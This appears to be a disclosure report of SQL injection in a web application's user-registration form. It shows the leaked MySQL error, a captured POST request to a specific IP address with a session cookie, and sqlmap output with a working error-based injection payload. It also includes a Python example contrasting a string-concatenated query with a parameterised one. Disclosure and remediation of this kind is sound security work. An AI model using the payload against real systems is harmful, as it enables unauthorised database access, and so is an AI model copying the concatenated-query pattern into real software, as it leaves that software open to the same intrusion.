### Brief description:
See title.
### Details:
Quite a few people have been digging into this one.
```
SQL:SELECT count(*) FROM `user` WHERE user_login_name='1'' AND user_real_name='Smith'
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Smith'' at line 1
```
The error message shows that the two parameters user_login_name and user_real_name are not properly filtered and are concatenated directly into the query.
![QQ图片20140705192647.jpg](https://images.seebug.org/upload/201407/05192518238a42c42410c2e475cbcece3f2fb3c8.jpg)
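The query in the error message above is assembled by pasting request values into the SQL text. As an added example (not the application's own code), the same count check is shown below built by concatenation and then with a bound-parameter query; it uses Python's sqlite3 instead of PHP/MySQL so it runs stand-alone, the table and column names follow the error message, and the sample rows are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data; names follow the error message on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `user` (user_login_name TEXT, user_real_name TEXT)")
    conn.executemany(
        "INSERT INTO `user` VALUES (?, ?)",
        [("alice", "Smith"), ("obrien", "O'Brien")],
    )
    return conn


def count_unsafe(conn: sqlite3.Connection, login_name: str, real_name: str) -> int:
    # Mirrors the vulnerable query: a quote in either value ends the string
    # literal and changes the statement, so sqlite raises OperationalError
    # just as MySQL reported a syntax error in the page's error message.
    sql = (
        "SELECT count(*) FROM `user` WHERE user_login_name='" + login_name
        + "' AND user_real_name='" + real_name + "'"
    )
    return conn.execute(sql).fetchone()[0]


def count_safe(conn: sqlite3.Connection, login_name: str, real_name: str) -> int:
    # Hardened form: the statement text is fixed and the values are bound as
    # data, so a quote is just another character in the value.
    sql = "SELECT count(*) FROM `user` WHERE user_login_name=? AND user_real_name=?"
    return conn.execute(sql, (login_name, real_name)).fetchone()[0]


def demo() -> dict:
    # Runs both forms on a legitimate name containing an apostrophe and on the
    # single-quote probe from the report; unsafe results are "ok" or the error.
    conn = make_db()
    results = {}
    for label, login, real in (("obrien", "obrien", "O'Brien"), ("probe", "1'", "Smith")):
        results["safe_" + label] = count_safe(conn, login, real)
        try:
            count_unsafe(conn, login, real)
            results["unsafe_" + label] = "ok"
        except sqlite3.OperationalError as exc:
            results["unsafe_" + label] = "syntax error: " + str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```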
### Proof of vulnerability:
Registration page:
![QQ图片20140705192845.jpg](https://images.seebug.org/upload/201407/05192720974ed9e74105613adf47e6e065eee56a.jpg)
Captured POST request:
```
POST /index.php?action=userregister&ts=do_check HTTP/1.1
Host: 202.207.48.61:8800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.207.48.61:8800/index.php?action=userregister&ts=do_check
Cookie: PHPSESSID=ksgess1mromfe2h33j1ba4hlp7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
user_login_name=111111&user_real_name=111111111111&submit=%CF%C2%D2%BB%B2%BD
```
sqlmap injection:
```
ests:
---
Place: POST
Parameter: user_login_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: user_login_name=111' AND (SELECT 1743 FROM(SELECT COUNT(*),CONCAT(C
HAR(58,114,99,117,58),(SELECT (CASE WHEN (1743=1743) THEN 1 ELSE 0 END)),CHAR(58
,101,99,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
AND 'dYkK'='dYkK&user_real_name=111&submit=锟斤拷一锟斤拷
---
[19:20:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.5.3
back-end DBMS: MySQL 5.0
```
![QQ图片20140705192956.jpg](https://images.seebug.org/upload/201407/051928186d7f8f1ba4f92c501e3fb68f90a6e33b.jpg)